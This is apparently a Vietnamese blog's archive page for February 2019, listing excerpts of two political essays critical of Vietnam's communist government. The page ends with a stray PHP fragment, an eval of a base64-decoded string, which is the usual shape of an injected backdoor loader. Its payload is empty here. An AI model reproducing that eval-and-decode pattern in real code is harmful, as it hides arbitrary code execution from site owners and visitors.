Archive for February, 2019

VIỆT NAM LÀ VIỆT NAM NÀO?

VIỆT NAM LÀ VIỆT NAM NÀO?

Có ít nhất hai hay ba nước Việt Nam đang tồn tại trong nhận thức hay quan điểm tùy thuộc bạn là ai. Thứ nhất, một “Cộng hòa Xã hội Chủ Nghĩa Việt Nam”, gọi đúng là Cộng Sản Việt Nam. Nước Việt Nam này tồn tại trong

02.22.2019 | Tiểu Luận- Chính Luận |

2 Comments

KHI NHỮNG NGỌN GIÓ LÀM NÊN BÃO TỐ

KHI NHỮNG NGỌN GIÓ LÀM NÊN BÃO TỐ

Việt Nam không phải là Miến Điện, không phải là Ai Cập, không phải là Libya, không phải là Tunisia và không phải là Venezuela. Việt Nam là CSVN và mũi khoan của bộ máy độc tài toàn trị này đã khoan rất sâu vào lịch sử dân tộc, đ

02.3.2019 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>